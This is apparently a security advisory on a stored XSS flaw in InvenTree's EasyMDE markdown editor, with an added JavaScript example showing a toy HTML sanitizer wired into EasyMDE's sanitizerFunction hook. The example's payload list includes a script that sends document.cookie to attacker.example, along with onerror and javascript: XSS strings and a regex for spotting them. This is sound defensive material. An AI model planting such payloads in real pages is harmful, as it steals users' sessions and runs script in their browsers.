GHSA-85q9-7467-r53q: XSS Vulnerability in Markdown Editor
InvenTree uses EasyMDE for editing and rendering markdown text in a number of places, for example the "notes" fields attached to many of its models.
By default, EasyMDE does not sanitize the HTML it renders from that markdown, so raw HTML or script placed in the markdown editor is inserted into the page unchanged and executes in the browser of any user who views the rendered content.
Note: the malicious markdown must first be stored in the database by an authenticated user with permission to edit the relevant field, so exploitation requires an authorized account and the risk is limited to what trusted users can do. The injected script still runs in the browser of whoever views the field, not only in the author's.
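The following is an added example, not code from InvenTree, EasyMDE or the advisory, and it does not describe InvenTree's actual fix. It shows the difference between EasyMDE's default (no sanitizer) and an editor configured with `renderingConfig.sanitizerFunction`, which is a real EasyMDE option that post-processes the HTML produced for the preview. `toySanitize`, `editorOptions`, `previewHtml`, `looksExecutable` and the `PAYLOADS` strings are constructed for this example; the toy sanitizer is a stand-in for DOMPurify so the code runs in Node.

```javascript
// Added example, not InvenTree's or EasyMDE's own code. EasyMDE's real option
// `renderingConfig.sanitizerFunction` post-processes the HTML produced for the
// preview; with it unset (the default), raw HTML inside the Markdown reaches the
// page DOM unchanged. Everything else here (toySanitize, editorOptions,
// previewHtml, looksExecutable, PAYLOADS) is constructed for this example.

const ALLOWED_TAGS = new Set(["p", "a", "em", "strong", "code", "pre", "ul", "ol",
  "li", "h1", "h2", "h3", "blockquote", "br", "img"]);
const ALLOWED_ATTRS = { a: ["href", "title"], img: ["src", "alt"] };
const SAFE_URL = /^(?:https?:|mailto:|\/|#)/i;   // rejects javascript:, data:, vbscript:

// Toy allowlist sanitizer standing in for DOMPurify so the example runs in Node.
// It drops unknown elements (script/style together with their contents), unknown
// attributes (so every on* handler goes) and unsafe href/src schemes.
// Use DOMPurify in a real deployment; this is not a production sanitizer.
function toySanitize(html) {
  let out = "";
  let i = 0;
  const n = html.length;
  while (i < n) {
    if (html[i] !== "<") { out += html[i++]; continue; }
    const end = html.indexOf(">", i);
    if (end === -1) { out += "&lt;"; i++; continue; }          // stray '<'
    const raw = html.slice(i + 1, end).trim();
    i = end + 1;
    const closing = raw.startsWith("/");
    const m = /^([a-zA-Z][a-zA-Z0-9]*)([\s\S]*)$/.exec(closing ? raw.slice(1) : raw);
    if (!m) continue;                                             // comments, doctype, junk
    const tag = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) {
      if (!closing && (tag === "script" || tag === "style")) {
        const close = html.toLowerCase().indexOf("</" + tag, i);
        const gt = close === -1 ? -1 : html.indexOf(">", close);
        i = gt === -1 ? n : gt + 1;                               // skip the element body too
      }
      continue;
    }
    if (closing) { out += "</" + tag + ">"; continue; }
    const kept = [];
    const attrRe = /([a-zA-Z:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      const name = a[1].toLowerCase();
      const value = (a[2] ?? a[3] ?? a[4]).trim();
      if (!(ALLOWED_ATTRS[tag] || []).includes(name)) continue;   // drops onerror, style, ...
      if ((name === "href" || name === "src") && !SAFE_URL.test(value)) continue;
      kept.push(` ${name}="${value.replace(/"/g, "&quot;")}"`);
    }
    out += "<" + tag + kept.join("") + ">";
  }
  return out;
}

// Options an application hands to `new EasyMDE({ element: textarea, ...options })`.
// sanitize === null reproduces the vulnerable default; passing a sanitizer wires
// it into EasyMDE's renderingConfig.sanitizerFunction hook.
function editorOptions(sanitize) {
  return { renderingConfig: sanitize ? { sanitizerFunction: sanitize } : {} };
}

// Models what the preview does with rendered HTML: apply the configured
// sanitizerFunction if present, otherwise insert the HTML as-is.
function previewHtml(options, renderedHtml) {
  const fn = options.renderingConfig && options.renderingConfig.sanitizerFunction;
  return typeof fn === "function" ? fn(renderedHtml) : renderedHtml;
}

// Constructed stand-ins for the HTML a Markdown renderer emits when the stored
// note contains raw HTML (Markdown passes inline HTML through untouched).
const PAYLOADS = [
  '<p>note</p><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  '<p><img src=x onerror="alert(1)"></p>',
  '<p><a href="javascript:alert(1)">click</a></p>',
];

// Crude detector used only to show the difference between the two configurations.
function looksExecutable(html) {
  return /<script|\son\w+\s*=|javascript:/i.test(html);
}

const vulnerable = editorOptions(null);
const hardened = editorOptions(toySanitize);
for (const p of PAYLOADS) {
  console.log("default  :", looksExecutable(previewHtml(vulnerable, p)));  // true
  console.log("sanitized:", looksExecutable(previewHtml(hardened, p)));    // false
}
```

In a browser deployment the hook would be `renderingConfig: { sanitizerFunction: (html) => DOMPurify.sanitize(html) }`. Note that this only covers EasyMDE's own preview: the stored markdown is still unsanitized in the database, so every other place the application renders those notes (other views, server-side rendering, exports) must apply the same sanitizer at output time.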